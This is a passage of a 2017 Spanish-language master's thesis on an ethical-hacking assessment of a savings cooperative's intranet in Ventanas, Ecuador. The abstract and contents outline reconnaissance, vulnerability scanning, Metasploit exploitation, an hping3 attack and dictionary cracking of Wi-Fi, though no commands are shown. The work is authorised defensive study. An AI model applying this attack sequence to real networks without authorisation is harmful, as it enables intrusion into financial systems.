universidad regional autÓnoma de los andes...
Post on 28-Sep-2020
1 Views
Preview:
TRANSCRIPT
UNIVERSIDAD REGIONAL AUTÓNOMA DE LOS ANDES
UNIANDES
FACULTAD DE SISTEMAS MERCANTILES
PROGRAMA DE MAESTRIA EN INFORMÁTICA EMPRESARIAL
PROYECTO DE INVESTIGACIÓN PREVIO A LA OBTENCIÓN DEL GRADO
ACADÉMICO DE MAGISTER EN INFORMÁTICA EMPRESARIAL
TEMA:
ESTRATEGIA DE HACKING ÉTICO Y LOS NIVELES DE SEGURIDAD EN
LA INTRANET DE LA COOPERATIVA DE AHORRO Y CRÉDITO 13 DE
ABRIL LTDA DE LA CIUDAD DE “VENTANAS”
AUTOR: LCDO. VILLARES SALTOS CRISTHIAN ANDRES
ASESOR: ING. OCHOA ESCOBAR LAURA MARLENE, MSC.
BABAHOYO - ECUADOR
2017
APROBACIÓN DEL ASESOR DEL TRABAJO DE TITULACIÓN
CERTIFICACIÓN:
Quien suscribe, legalmente CERTIFICA QUE: El presente trabajo de Titulación
realizado por el señor Cristhian Andrés Villares Saltos, estudiante de la
Carrera de Sistemas, Facultad de Sistema Mercantiles, con el tema
“ESTRATEGIA DE HACKING ÉTICO Y LOS NIVELES DE SEGURIDAD EN
LA INTRANET DE LA COOPERATIVA DE AHORRO Y CRÉDITO 13 DE
ABRIL LTDA DE LA CIUDAD DE “VENTANAS” ”, ha sido prolijamente
revisado, y cumple con todos los requisitos establecidos en la normativa
pertinente de la Universidad Regional Autónoma de los Andes -UNIANDES-,
por lo que aprueba su presentación.
Babahoyo, Agosto del 2017
_________________________________
Ing. Laura Marlene Ochoa Escobar, Msc.
C.I. 1200634275
ASEROR
DECLARACIÓN DE AUTENTICIDAD
Yo, Cristhian Andrés Villares Saltos, estudiante de la Carrera de Sistemas,
Facultad de Sistemas Mercantiles, declaro que todos los resultados obtenidos
en el presente trabajo de investigación, previo a la obtención del título de
MAGISTER EN INFORMÁTICA EMPRESARIAL, son absolutamente
originales, auténticos y personales; a excepción de las citas, por lo que son de
mi exclusiva responsabilidad.
Babahoyo, Agosto del 2017
_________________________________
Lcdo. Cristhian Andrés Villares Saltos
CI. 120485055-4
AUTOR
CERTIFICACIÓN DEL LECTOR DEL TRABAJO DE TITULACIÓN
Yo, Fredy Maximiliano Jordán Cordones En calidad de Lector del Proyecto
de Titulación.
CERTIFICO:
Que el presente trabajo de titulación realizado por el estudiante Cristhian
Andrés Villares Saltos sobre el tema: “ESTRATEGIA DE HACKING ÉTICO Y
LOS NIVELES DE SEGURIDAD EN LA INTRANET DE LA COOPERATIVA
DE AHORRO Y CRÉDITO 13 DE ABRIL LTDA DE LA CIUDAD DE
“VENTANAS”, ha sido cuidadosamente revisado por el suscrito, por lo que he
podido constatar que cumple con todos los requisitos de fondo y forma
establecidos por la Universidad Regional Autónoma de Los Andes, para esta
clase de trabajo, por lo que autorizo su presentación.
Babahoyo, Agosto del 2017
_________________________________
Lsi. Fredy Maximiliano Jordán Cordones
CI. 180284618-6
LECTOR
DERECHOS DE AUTOR
Yo, Cristhian Andrés Villares Saltos, declaro que conozco y acepto la
disposición constante en el literal d) del Art. 85 del Estatuto de la Universidad
Regional Autónoma de Los Andes, que en su parte pertinente textualmente
dice. El patrimonio de la UNIANDES, está constituido por: La propiedad
intelectual sobre las Investigaciones, trabajos científicos o técnicos, proyectos
profesionales y consultaría que realicen en la Universidad o por cuenta de ella
Babahoyo, Agosto del 2017
_________________________________
Lcdo. Cristhian Andrés Villares Saltos
CI. 120485055-4
AUTOR
DEDICATORIA
A dios por haberme permitido llegar hasta este punto y haberme dado salud
para lograr mis objetivos, además de su infinita bondad y amor.
A mi padre, por ser el pilar más importante y por demostrarme siempre
su cariño y apoyo incondicional.
A mi amada esposa Viviana y mis queridos hijos Ashley y Sebastián por ser mi
fuente de motivación e inspiración, para superarme cada día más y así poder
luchar para que la vida nos depare un futuro mejor.
A toda mi familia y amigos que es lo mejor y más valioso que dios me ha dado.
AGRADECIMIENTO
En primer lugar a Dios por haberme guiado por el camino de la felicidad hasta
ahora; en segundo lugar a cada uno de los que son parte de mi familia a mi
PADRE Rodrigo Villares, mi MADRE, mi segunda madre Silvana Orellana, mi
tercera madre y no menos importante, MI ABUELA; a mis compañeros de tesis
porque en esta armonía grupal lo hemos logrado y a mi directora de tesis quién
me ayudó en todo momento, Msc. Laura Ochoa.
A mis catedráticos a quienes les debo gran parte de mis conocimientos, gracias
a su paciencia y enseñanza y finalmente un eterno agradecimiento a esta
prestigiosa universidad la cual abre sus puertas a jóvenes como nosotros,
preparándonos para un futuro competitivo y formándonos como personas de
bien.
RESUMEN EJECUTIVO
Este trabajo de investigación tiene por objetivo analizar las vulnerabilidades
que se encuentran expuestas en la Cooperativa de Ahorro y Crédito 13 de Abril
Ltda. de la ciudad de Ventanas.
La estructura del desarrollo de Hacking Ético se desarrolla con el paquete de
Herramientas de Kali Linux, donde primero se realiza un análisis de las
Vulnerabilidades de Los sistemas Operativos de los equipos de la cooperativa,
se recopila la información de los puertos y protocolos que en los equipo pueden
ocasionar explotación de algún servicios que se ejecutan.
La herramienta que se utiliza en la fase de reconocimiento Cain & Abel, es una
herramienta con interfaz gráfica que permitió, analizar la red y los dispositivos
conectados como nombre y sistema operativo utilizado, en esta fase también
se utilizó la herramienta Zmap para establecer como se encuentra estructurada
la red.
En la Fase de escaneo se utiliza la Herramienta Zmap que brinda información
puerto y protocolo que se encuentran activados en cada equipo y su respectiva
dirección IP, después se realiza un análisis de las vulnerabilidades con la
Herramienta OpenVas a través de su entorno gráfico Green Bone Security
Desktop, mostrando la vulnerabilidad que está expuesto el protocolo o puerto
de un servicio.
La fase de explotación se utiliza la herramienta Metexplot proporcionada por
Kali Linux en esta fase para explotar las vulnerabilidades de las redes
inalámbrica de la cooperativa se utiliza la herramienta Airodump para el análisis
y ataques aireplay y aircrack.
Para culminar con el informe de hallazgos donde se manifiesta los resultados
del hacking ético.
ABSTRACT
This research aims to analyze the vulnerabilities that are exposed in the
Savings and Credit Cooperative 13 of April of the city of Ventanas.
The structure for the development of Ethical Hacking is developed with the Kali
Linux toolkit, carrying out at the beginning an analysis of the capabilities of the
operational systems of all the technological equipment of the Cooperative, a
collection of information on the ports and protocols that can cause the
exploitation of some services that are executed in the equipment.
The tool used in the Cain & Abel reconnaissance phase, is a tool with graphical
interface that allowed analyzing the network and connecting devices as the
number and the operating system used, in this phase it was also used the Zmap
tool to establish how the network is structured.
In the scan phase it is used the Zmap Tool, which provide information about the
port and protocol that are activated on each computer and its respective IP
address, after that it is performing a vulnerability analysis with the OpenVas
Tool through its graphical environment Green Bone Security Desktop, showing
the vulnerability exposed by the protocol or port of a service.
In the exploitation phase it is used the Metexploit tool provided by Kali Linux, at
this stage, to exploit the vulnerabilities of the cooperative's wireless networks, it
is used the Airodump tool for analysis and attacks air raids and aircrack.
At the end it is done report of findings where the results of ethical hacking are
manifested.
ÍNDICE GENERAL
PORTADA
APROBACIÓN DEL ASESOR DEL TRABAJO DE TITULACIÓN
DECLARACIÓN DE AUTENTICIDAD
CERTIFICACIÓN DEL LECTOR DEL TRABAJO DE TITULACIÓN
DERECHOS DE AUTOR
DEDICATORIA
AGRADECIMIENTO
RESUMEN EJECUTIVO
ABSTRACT
INTRODUCCIÓN. .......................................................................................................... 1
Antecedentes de la investigación. ........................................................................... 1
Planteamiento del problema..................................................................................... 2
Formulación del problema. ....................................................................................... 3
Delimitación del problema. ....................................................................................... 4
Objeto de Investigación y Campo de Acción: ........................................................ 4
Identificación de la Línea de Investigación: ........................................................... 4
Objetivos. ..................................................................................................................... 4
Objetivo General. ....................................................................................................... 4
Objetivo Específicos: ................................................................................................. 4
Idea a defender. ......................................................................................................... 5
Justificación del tema. ............................................................................................... 5
Metodología a emplear............................................................................................. 6
Elementos de novedad, aporte teórico y significación práctica, en
dependencia del alcance de la tesis ....................................................................... 7
CAPITULO I.................................................................................................................... 8
1. MARCO TEORICO. ............................................................................................... 8
1.1. Seguridad de la Información............................................................................. 8
1.1.1. Seguridad Informática ................................................................................. 8
1.1.2. Integridad ...................................................................................................... 9
1.1.3. Confidencialidad. ......................................................................................... 9
1.1.4. Disponibilidad. .............................................................................................. 9
1.1.5. Amenazas que está expuesta la información. ...................................... 10
1.1.6. Ataques que está expuesta la información. .......................................... 10
1.1.7. Modelo OSI................................................................................................. 10
1.1.8. Red Informática.......................................................................................... 11
1.1.9. Tipos de redes de computadoras. .......................................................... 11
1.1.10. Topologías de las redes. ........................................................................ 14
1.1.11. Intranet. .................................................................................................... 17
1.1.12. Hacker. ...................................................................................................... 17
1.1.13. Tipos de Hacker....................................................................................... 17
1.1.14. Hacking Ético. .......................................................................................... 19
1.1.15. Modos de Hacking Ético. ...................................................................... 20
1.1.16. Fases del hacking. ................................................................................. 21
1.1.17. Tipos de Hacking..................................................................................... 22
1.1.18. Modalidades del Hacking. ...................................................................... 23
1.1.19. Ataques a realizarse en el Ethical Hacking......................................... 24
1.1.20. Herramientas de reconocimiento. ......................................................... 27
1.1.21. Otros recursos online.............................................................................. 29
1.1.22. Escaneo Basado en Web....................................................................... 30
1.1.23. Smart Whois. ............................................................................................ 31
1.1.24. Análisis de correo electrónico. .............................................................. 32
1.1.25. Nexpose. ................................................................................................... 33
1.1.26. Open Vas. ................................................................................................. 33
1.1.27. GetAcct. .................................................................................................... 34
1.1.28. DumpSec. ................................................................................................. 34
1.1.29. Frameworks de explotación................................................................... 34
1.1.30. Ingeniería Social. ..................................................................................... 34
1.1.31. Dos............................................................................................................. 35
1.1.32. Aircrack. .................................................................................................... 35
1.1.33. Phishing .................................................................................................... 35
1.1.34. Kali Linux. ................................................................................................. 36
1.2. Niveles de Seguridad....................................................................................... 36
1.3. Valoración Crítica. ............................................................................................ 38
1.4. Conclusiones del Capítulo. ............................................................................. 38
CAPITULO II. ............................................................................................................... 40
2. MARCO METODOLÓGICO Y PLANTEAMIENTO DE LA PROPUESTA .. 40
2.1. Caracterización del Sector. ............................................................................. 40
2.2. Descripción del Procedimiento Metodológico. ............................................. 42
2.2.1. Tipos de Investigación .............................................................................. 43
2.2.2. Métodos de Investigación......................................................................... 43
2.2.3. Técnicas e Instrumentos de la Investigación. ....................................... 45
2.3 Propuesta del Investigador. ............................................................................. 58
2.4 Conclusiones Parciales del Capítulo. ............................................................. 58
CAPITULO III ............................................................................................................... 60
3. VALIDACIÓN Y/O EVALUACIÓN DE RESULTADOS DE SU APLICACIÓN
..................................................................................................................................... 60
3.1. Título de la Propuesta...................................................................................... 60
3.2. Caracterización de la propuesta. ................................................................... 60
3.3. Desarrollo de la propuesta. ............................................................................. 61
3.3.1. Fase de Reconocimiento.......................................................................... 61
3.3.2. Fase de Escaneo....................................................................................... 63
3.3.3. Fase de Explotación.................................................................................. 70
3.3.4. Informe de Hallazgos. ............................................................................... 81
3.3.5. Conclusiones parciales, para mejorar la seguridad de la intranet de la
Cooperativa de Ahorro y Crédito........................................................................ 91
CONCLUSIONES Y RECOMENDACIONES ...................................................... 92
Conclusiones............................................................................................................. 92
Recomendaciones ................................................................................................... 93
BIBLIOGRAFÍA........................................................................................................ 94
ANEXO No. 1 VALIDACION ................................................................................. 97
ANEXO No. 2 ENCUESTA .................................................................................... 99
ANEXO No. 3 MITIGACIÓN ATAQUES DE ESCANEO DE PUERTOS .....101
ANEXO No. 4 INFORME DE ANÁLISIS ...........................................................134
INDICE DE TABLAS
Tabla 1. Población de la Cooperativa de Ahorro y Crédito 13 de Abril Ltda. ..... 46
Tabla 2. Respuesta, Encuesta Pregunta No 1, Empleados.................................. 47
Tabla 3. Respuesta, Encuesta Pregunta No 2, Empleados.................................. 48
Tabla 4. Respuesta, Encuesta Pregunta No 3, Empleados.................................. 49
Tabla 5. Respuesta, Encuesta Pregunta No 4, Empleados.................................. 50
Tabla 6. Respuesta, Encuesta Pregunta No 5, Empleados.................................. 51
Tabla 7. Respuesta, Encuesta Pregunta No 6, Empleados.................................. 52
Tabla 8. Respuesta, Encuesta Pregunta No 7, Empleados.................................. 53
Tabla 9. Respuesta, Encuesta Pregunta No 8, Empleados.................................. 54
Tabla 10. Respuesta, Encuesta Pregunta No 9, Empleados ............................... 55
Tabla 11. Respuesta, Encuesta Pregunta No 10, Empleados ............................. 56
Tabla 12. Respuesta, Encuesta Pregunta No 11, Empleados ............................. 57
Tabla 13. Número de empleados .............................................................................. 83
Tabla 14. Cronograma de actividades de Auditoría ............................................... 86
Tabla 15. Etapa de Escaneo de Puertos. ................................................................ 88
Tabla 16. Etapa de Mitigación de Ataques de Fuerza Bruta ................................ 89
Tabla 17. Etapa Análisis de Vulnerabilidades. ........................................................ 90
INDICE DE FIGURAS
Figura 1. Modelo OSI .................................................................................................. 11
Figura 2. Red Lan ........................................................................................................ 12
Figura 3. Red Man ....................................................................................................... 13
Figura 4. Red Wan ....................................................................................................... 13
Figura 5. Topología en Bus ........................................................................................ 14
Figura 6. Topología en estrella .................................................................................. 15
Figura 7. Topología en anillo...................................................................................... 16
Figura 8. Topología en Malla .................................................................................... 16
Figura 9. Fases del Hacking....................................................................................... 22
Figura 10. Descripción del correo electrónico ......................................................... 32
Figura 11. Orgánico Funcional................................................................................... 42
Figura 12. Gráfico Estadístico Pregunta No 1, Empleados .................................. 47
Figura 13. Gráfico Estadístico Pregunta No 2, Empleados .................................. 48
Figura 14. Gráfico Estadístico Pregunta No 3, Empleados .................................. 49
Figura 15. Gráfico Estadístico Pregunta No 4, Empleados .................................. 50
Figura 16. Gráfico Estadístico Pregunta No 5, Empleados .................................. 51
Figura 17. Gráfico Estadístico Pregunta No 6, Empleados .................................. 52
Figura 18. Gráfico Estadístico Pregunta No 7, Empleados .................................. 53
Figura 19. Gráfico Estadístico Pregunta No 8, Empleados .................................. 54
Figura 20. Gráfico Estadístico Pregunta No 9, Empleados .................................. 55
Figura 21. Gráfico Estadístico Pregunta No 10, Empleados ................................ 56
Figura 22. Gráfico Estadístico Pregunta No 11, Empleados ................................ 57
Figura 23. Esquema de Hacking Ético ..................................................................... 61
INDICE DE ILUSTRACIONES
Ilustración 1. Análisis de la red con CAIN & ABEL................................................. 62
Ilustración 2. Informe de escaneo General ZMAP.................................................. 63
Ilustración 3. Fase de escaneo .................................................................................. 64
Ilustración 4. Kali Linux acceso a OpenVas ............................................................ 66
Ilustración 5. Interfaz de Administración de análisis de Open Vas ...................... 67
Ilustración 6. Resultado Escaner Ip. 192.168.0.6 ................................................... 67
Ilustración 7. Resultado de Administración de análisis de OpenVas .................. 68
Ilustración 8. Análisis de Vulnerabilidades. ............................................................. 69
Ilustración 9. Análisis de los puertos que tienen vulnerabilidades....................... 69
Ilustración 10. Interfaz de Meta Exploit de Kali Linux ............................................ 70
Ilustración 11. Visualización de exploit de Kali Linux............................................. 71
Ilustración 12. Selección de Exploit .......................................................................... 71
Ilustración 13. Uso del exploit .................................................................................... 72
Ilustración 14. Etapa de ejecución del Exploit......................................................... 72
Ilustración 15. Etapa de ejecución del Exploit......................................................... 73
Ilustración 16. Etapa de ejecución del Exploit......................................................... 74
Ilustración 17. Etapa de ejecución del Exploit......................................................... 74
Ilustración 18. Evidencia creación de carpetas....................................................... 75
Ilustración 19. Proceso de instalación de Hping3................................................... 75
Ilustración 20. Comando de ejecución Hping3........................................................ 76
Ilustración 21. Análisis de wireless con aimon-ng .................................................. 77
Ilustración 22. Análisis de wireless con Airodump-ng mon0................................. 77
Ilustración 23. Análisis de wireless ........................................................................... 79
Ilustración 24. Descarga del diccionarios................................................................. 80
Ilustración 25. Análisis de la clave ............................................................................ 80
1
INTRODUCCIÓN.
Antecedentes de la investigación.
La seguridad informática ha ganado popularidad en los últimos años y ha
pasado de ser considerada un gasto, a ser vista como una inversión por parte
de los directivos de las empresas y organizaciones, hemos convergido todos en
un mundo digital en el que la información es el activo intangible más valioso
con el que contamos, y al ser un activo, debemos protegerlo de posibles
pérdidas, robos, mal uso, etc. Es aquí en donde juega un papel preponderante
un actor antes desconocido: el hacker ético.
En una investigación preliminar llevada a cabo en los repositorios digitales de
las universidades a nivel nacional se han encontrado varios trabajos
relacionados a la implementación de un hacking ético como alternativa de
solución a la seguridad informática de las empresas, entre ellos podemos
mencionar los siguientes:
El proyecto del Ingeniero Pazmiño Caluña Andrés Alejandro, de la Escuela
Superior Politécnica del Chimborazo de la ciudad de Riobamba, con su tema
“APLICACIÓN DE HACKING ÉTICO PARA LA DETERMINACIÓN DE
VULNERABILIDADES DE ACCESO A REDES INALÁMBRICAS WIFI”
(2012). Analizar las técnicas de Hacking para utilizarlas como herramienta de
auditoría que reporten las amenazas que se presentan en este tipo de redes y
en consecuencia generar una guía referencial que puedan mitigar los riesgos
que presentan las vulnerabilidades de acceso.
El trabajo del Ingeniero Huilca Chicaiza Gloria Nataly, de la Universidad
Técnica de Ambato de la ciudad de Ambato, con su tema “HACKING ETICO
PARA DETECTAR VULNERABIDADES EN LOS SERVICIOS DE LA
INTRANET DEL GOBIERNO AUTÓNOMO DESCENTRALIZADO MUNICIPAL
DEL CANTÓN CEVALLOS" (2012). El objetivo principal de la aplicación de
hacking ético es descubrir las deficiencias relativas a seguridad y las
2
vulnerabilidades de los sistemas informáticos, analizarlas, calibrar su grado de
riesgo y peligrosidad, y recomendar las posibles soluciones más apropiadas
para cada una de ellas.
Planteamiento del problema.
Las empresas depende de las decisiones del gerente general o accionista de la
misma llegando a un consenso y determinado una propuesta, para el progreso
o el fracaso de la empresa como resultado de las decisiones que se hayan
tomado.
Como hemos visto hoy en día y el pasar del tiempo las experiencias que han
tenido las empresas en seguridad de la información, son poco determinantes
razones que afectan la capacidad y el buen funcionamiento, se debe contar con
un personal especializado en auditoria informática.
En algunas empresas ven como gasto, invertir en seguridad de la información,
logrando un problema de gran magnitud y favoreciendo a personas
inescrupulosas o hackers maliciosos en causar daños a los sistemas poniendo
en riesgo la operatividad de los servicios informáticos.
Si las decisiones no son tomadas eficientemente, pueden trasladar
consecuencias en la organización o empresa.
Al momento de encontrar vulnerabilidades en los equipos auditados que
puedan ser explotadas en algunos casos, acceso al sistema afectado inclusive;
pero siempre en un ambiente supervisado, se ve afectado el futuro de la
empresa.
La red inalámbrica de los distintos departamentos en especial la financiera
cuenta con acceso de seguridad muy bajo lo cual permite ser blanco perfecto
para los intrusos y por consiguiente las contraseñas se vuelven el aperitivo
especial para espiar información y luego ser hurtada.
Los Sistemas Operativos de los Equipos se encuentran sin el licenciamiento,
por esto no se encuentran con las actualizaciones de seguridad, y esto provoca
3
que puedan ser blancos de virus que pueden afectar la integridad de la
información.
Las contraseñas no tienen un grado de dificultad y es por esta razón son
vulnerables al acceso indebido y mal uso de la información.
No existe un adecuado posicionamiento del cableado estructurado, y seguridad
de los dispositivos que provee la conectividad de servicios.
Todo este problema provoca en la cooperativa descontento en los servicios por
parte de los usuarios y desconfianza en los directivos, sobre los niveles de
seguridad que tiene la infraestructura tecnológica de la cooperativa de Ahorro y
Crédito 13 de Abril.
La investigación es un proceso que ha puesto a las autoridades a cumplir con
objetivos específicamente en la Cooperativa de Ahorro y Crédito 13 de Abril
Ltda. Se ha demostrado que los avances tecnológicos tienen un crecimiento
inalcanzable, no se puede dar el lujo de desproteger el acceso a sus redes y
sistemas con el riesgo de ver comprometida su información.
Mediante el Hacking Ético se determinar de forma proactiva si su
infraestructura informática es vulnerable a intrusiones provenientes de internet
o desde su red interna, por lo cuanto se da a conocer como propuesta y
solución a este problema y se muestra recomendaciones adecuadas con la
finalidad de generar un nivel de seguridad apropiado para la empresa.
Formulación del problema.
¿Cómo evaluar los niveles de seguridad en la intranet de la Cooperativa de
Ahorro y Crédito 13 de Abril del cantón Ventanas?
4
Delimitación del problema.
Este trabajo se desarrolla en la Cooperativa de Ahorro y Crédito 13 de Abril
Ltda., en los equipos de escritorio, servidores que brindan los servicios
financieros, y las redes ethernet, wireless, para buscar las vulnerabilidades
que están expuestas los equipos descritos. Una vez que se descubran las
vulnerabilidades a través de un informe como indica la metodología del Hacking
Ético.
Objeto de Investigación y Campo de Acción:
Objeto de Investigación:
Seguridad informática
Campo de Acción:
Niveles de Seguridad en intranets
Identificación de la Línea de Investigación:
Tecnologías de información y comunicación.
Objetivos.
Objetivo General.
Implementar una estrategia de hacking ético para mejorar los niveles de
seguridad en la intranet de la Cooperativa de Ahorro y Crédito 13 de Abril Ltda.
de la ciudad de “Ventanas”.
Objetivo Específicos:
Fundamentar teóricamente las estrategias de hacking ético, niveles de
seguridad en intranets.
5
Determinar los niveles de vulnerabilidad y seguridad de la intranet en la
Cooperativa de Ahorro y Crédito 13 de Abril Ltda.
Elaborar los componentes de la estrategia de hacking ético.
Validar la propuesta.
Idea a defender.
Con la implementación de la estrategia de hacking ético, se mejorará los
niveles de seguridad en la intranet de la Cooperativa de Ahorro y Crédito 13 de
Abril Ltda. de la ciudad de “Ventanas”.
Justificación del tema.
Las empresas públicas y privadas en el país, tienen los procesos
automatizados pero no toman en cuenta los niveles de seguridad de la intranet
de sus oficinas o departamentos, lo cual es riesgoso hoy en día con el sin
número de amenazas que están expuestos los equipos de la intranet.
Esta investigación da una visión de las vulnerabilidades y amenazas que están
expuestas hoy en día la infraestructura tecnológica de la empresas, así mismo
explica las metodologías ,practicas, y etapas que realiza un hacker para poder
sustraer o acceder a equipos de la compañía.
También realiza un análisis de las herramientas en cada etapa que hace
posible la manipulación de los equipos por personas no autorizadas y cómo
puede afectar a la infraestructura tecnológica esta intrusión no autorizada.
La investigación proporciona soluciones a cada una de los problemas
localizados en cada etapa del Hacking Ético, por lo tanto este trabajo permitirá
a las empresas públicas y privadas tener una visión del impacto de una
intrusión pero al mismo tiempo como evitarla.
6
Metodología a emplear
Métodos
Histórico-lógico: Ya que basándose en procesos históricos se presentara una
solución actualizada a los problemas.
Analítico-Sintético: Para elaboración de la fundamentación científica que
sustentara la solución del problema.
Método Inductivo-Deductivo.
Consistió en establecer enunciados universales a partir de cierta experiencia,
esto es, ascender lógicamente a través del conocimiento científico, desde la
observación de los fenómenos o hechos de la realidad universal que los
contiene.
Método sistémico.
Se lo utilizó para fusionar lo teórico con la aplicación práctica.
Instrumentos de Investigación.
Para la encuesta se utiliza un cuestionario o test.
La entrevista: Para obtener información y opiniones de parte de la empresa.
Resumen de la estructura de la tesis.
El documento se encuentra estructurado en cuatro secciones, en la
primera sección la introducción se analiza el problema, se indicara la línea
de investigación, se justificara la propuesta y se detallara los objeto de
investigación.
7
La segunda sección está conformada por el capítulo I el cual trata la
fundamentación teórica donde se explica los conceptos principales, las
distintas posiciones teóricas sobre el objeto de investigación.
La tercera sección conforma el capítulo II donde se presenta la propuesta
del autor según los resultados alcanzados y aportados por la
metodología de la investigación.
Y la cuarta sección está compuesta por el análisis de todos los
resultados alcanzados en la investigación, y con la validación de los
resultados alcanzados terminando con conclusiones generales,
recomendaciones y bibliografía.
Elementos de novedad, aporte teórico y significación práctica, en
dependencia del alcance de la tesis
El aporte teórico de la investigación radica en la sistematización
contextualizada de aspectos fundamentales del hacking ético, aplicados al
estudio del objeto y campo seleccionados, así como en la determinación de las
dimensiones e indicadores del sistema que se propone.
La significación práctica del resultado científico obtenido, consiste en el valor
que posee las pruebas de intrusión para contribuir a la solución del problema
planteado en el contexto se seguridad informática que se estudia.
La novedad científica de la investigación radica en la elaboración de los
fundamentos metodológicos necesarios para sustentar la implementación de
una auditoria de sistema dirigido a contribuir con la seguridad de la información
de la Cooperativa de Ahorro y Crédito 13 de Abril de la ciudad de Ventanas.
El presente trabajo beneficia a la empresa, ya que potenciará los niveles de
seguridad en la intranet, aportando con ello a una eficiente prueba de intrusión
de su seguridad de información.
8
CAPITULO I.
1. MARCO TEORICO.
1.1. Seguridad de la Información.
La seguridad de la información tiene por objetivo proteger a los sistemas
informáticos frente a las amenazas. La aplicación de medidas de seguridad
debe realizarse de manera planificada y racional, para evitar dirigir esfuerzos
allí donde no hacían falta” (Álvarez Gonzalo, Pérez Pedro, 2009).
Tomando en cuenta la definición del autor hoy en día la seguridad informática
juega un papel fundamental en las empresas, al punto que las empresas crean
departamentos especializados para salvaguardar la información automatizada
a través de los sistemas informáticos.
1.1.1. Seguridad Informática
En el mundo de la seguridad de la información e informática, es habitual
manejar una terminología específica (activos, vulnerabilidades, amenazas,
ataques, riesgos, impacto, desastre, contingencias, etc.) (Gascó Gema, 2011).
Seguridad Lógica.
Se encarga de proteger la parte lógica de un sistema informático (datos,
aplicaciones y sistemas operativos). Uno de los medio más utilizados es la
criptografía la cual es muy utilizada al momento de que la información fluye a
través de la red.
Seguridad Activa.
Son medidas preventivas que se encargan de detectar y evitar cualquier
incidente en los sistemas informáticos antes de que se produzca .Por ejemplo,
utilización de contraseñas.
9
Seguridad Pasiva.
Son las medidas correctoras y comprende todas aquellas técnicas o
procedimientos necesarios para minimizar las consecuencias de un incidente
de seguridad .Por ejemplo, las copias de seguridad.
1.1.2. Integridad
La integridad es un principio básico de la seguridad informática que consiste en
garantizar que la información solo pueda ser alterada por las personas
autorizadas o usuarios legítimos, independientemente de si esa modificación se
produce de forma intencionada o no” (Ramada Davis, Onrubia Ramón, 2011).
La opinión del autor indica que la integridad su objetivo es mantener la
información sin modificaciones que no hayan sido autorizadas previamente.
1.1.3. Confidencialidad.
La confidencialidad es otro principio de la seguridad informática esta debe
garantizar que la información sea leída solo por el usuario de destino.
Un sistema de confidencialidad tiene éxito cuando un usuario externo no puede
extraer información de una transmisión de información que hayan realizado dos
o más interlocutores en un sistema de información. (Romero García, 2012).
1.1.4. Disponibilidad.
La disponibilidad se basa en que la información y los servicios estén
disponibles para los usuarios que la requieren.
Se produce un ataque contra la disponibilidad cuando se consigue que un
recurso deje de estar disponible para otros usuarios que acceden a él a través
de la red, (Ramada Davis, Onrubia Ramón, 2011).
10
1.1.5. Amenazas que está expuesta la información.
Las amenazas son cualquier entidad que origine un tipo de evento que puede
realizar daño en un sistema de información, aunque también existen amenazas
que afectan a los sistemas de información de manera involuntaria por ejemplo
algún tipo de desastres natural. Las amenazas pueden ser activas o pasivas de
acuerdo al tipo de taque que se puede realizar.
Amenazas Pasivas.
También son conocidas como escuchas su objetivo es obtener información de
una comunicación. Por ejemplo existe software que monitorea el tráfico de una
red wifi.
Amenazas Activas.
Estas tratan de realizar cambios en la información de un sistema, por ejemplo
se encuentra la inserción de mensajes ilegítimos la clonación de certificados.
1.1.6. Ataques que está expuesta la información.
Es una acción que trata de aprovechar una vulnerabilidad de un sistema
informático para provocar un impacto sobre él tomar el control del mismo. Trata
de acciones tanto intencionadas como fortuitas que pueden llegar a poner en
riesgo un sistema (Roa José, 2013).
1.1.7. Modelo OSI
En 1984, la Organización Internacional de Estandarización (ISO) desarrolló un
modelo llamado OSI (Open Systems Interconnection) Interconexión de
sistemas abiertos, el cual es usado para describir el uso de datos entre la
conexión física de la red y la aplicación del usuario final. Este modelo es el
mejor conocido y utilizado para describir los entornos de red
11
Figura 1. Modelo OSI
Fuente: http://es.wikipedia.org/wiki/Modelo_OSI
1.1.8. Red Informática.
Una red es un medio de comunicación que permite a personas o grupos
compartir información y servicios”, (Dordoigne José, 2003).
Mediante la definición del autor se puede indicar que una red de computadores
o de ordenadores es un conjunto de equipos informáticos provisto de software
conectados entre sí por medio de dispositivos físicos que son capaces de
enviar y recibir datos con la finalidad de compartir información y recursos,
gracias a las redes informáticas es posible que las grandes empresas puedan
compartir entre todos los ordenadores de una empresa una impresora, un
escáner y grabadores de información etc.
1.1.9. Tipos de redes de computadoras.
Las industrias de telecomunicaciones según el área que se quiera cubrir, ha
previsto tipos de redes que dan solución las necesidades del usuario, estas
pueden ser LAN (Local Área Network), MAN (Metropolitan Area Network), WAN
(Wide Área Network), (Garzón María, Sampalo María, 2009).
12
1.1.9.1. Redes LAN.
Estas redes son utilizadas para interconectar equipos en un solo edificio o
campus de poca distancia de longitud, se utilizan para conectividad de
computadores personales, impresoras, escáner y otros dispositivos de red, los
cuales compartirán recursos e información. En este tipo de redes se deberán
considerar tres aspectos: tamaño, tecnología de transmisión y topología.
Figura 2. Red Lan Fuente: http://technet.microsoft.com/es-es/library/dd568932.aspx
1.1.9.2. Redes de Área Metropolitana (MAN).
Estas redes se encuentran localizadas en edificios diferentes distribuidos en
distancias no superiores al ámbito urbano, una MAN generalmente consta de
una o más LAN dentro de un área geográfica común, (Garzón María, Sampalo
María,2009).
Sirven para enlazar servicios separados en una zona urbana por ejemplo
semáforos control de tráficos, cámaras, también para servicios privados como
la televisión por cable, servicios bancarios o comerciales, son utilizadas por
proveedores de servicios para conectividad de dos o más redes LAN utilizando
equipos privados que por lo general son de comunicación inalámbricas o en
ciertos casos muy especiales a través de fibra óptica por su costo.
13
Figura 3. Red Man Fuente: http://www.informatica-hoy.com.ar/redes
1.1.9.3. Redes de Área Amplia (WAN).
Estas redes su función está orientada a la interconexión de dos o más redes
que se encuentran ubicadas en lugares distantes o en diferentes ciudades,
provincias, países o también edificios ubicados en diferentes continentes.
Figura 4. Red Wan Fuente: https://www.microsoft.com/spain/technet/recursos/articulos/ipsecch3.mspx
14
1.1.10. Topologías de las redes.
Topologías son configuraciones básicas que el personal que manejan sistemas
de información utiliza para cablear las redes. Ellas son el diseño básico de
cualquier red. Las diferentes topologías usadas para conectar computadoras
incluyen bus, estrella, anillo, y híbrida (Perpinan Antonio, 2010).
1.1.10.1. Topología en Bus.
Esta topología requiere que todos los equipos informáticos estén conectados al
mismo cable, si un equipo envía datos es un dato transmitido en broadcast
(multidifusión), esto quiere decir que solo el nodo al cual fue enviado el dato lo
leerá el resto simplemente los descarta.
Figura 5. Topología en Bus
Fuente: http://www.econ.uba.ar/www/departamentos
1.1.10.2. Topología Estrella.
En esta topología todos los cables de todas las computadoras son conectados
a un dispositivo central llamado hub. Los datos de una computadora son
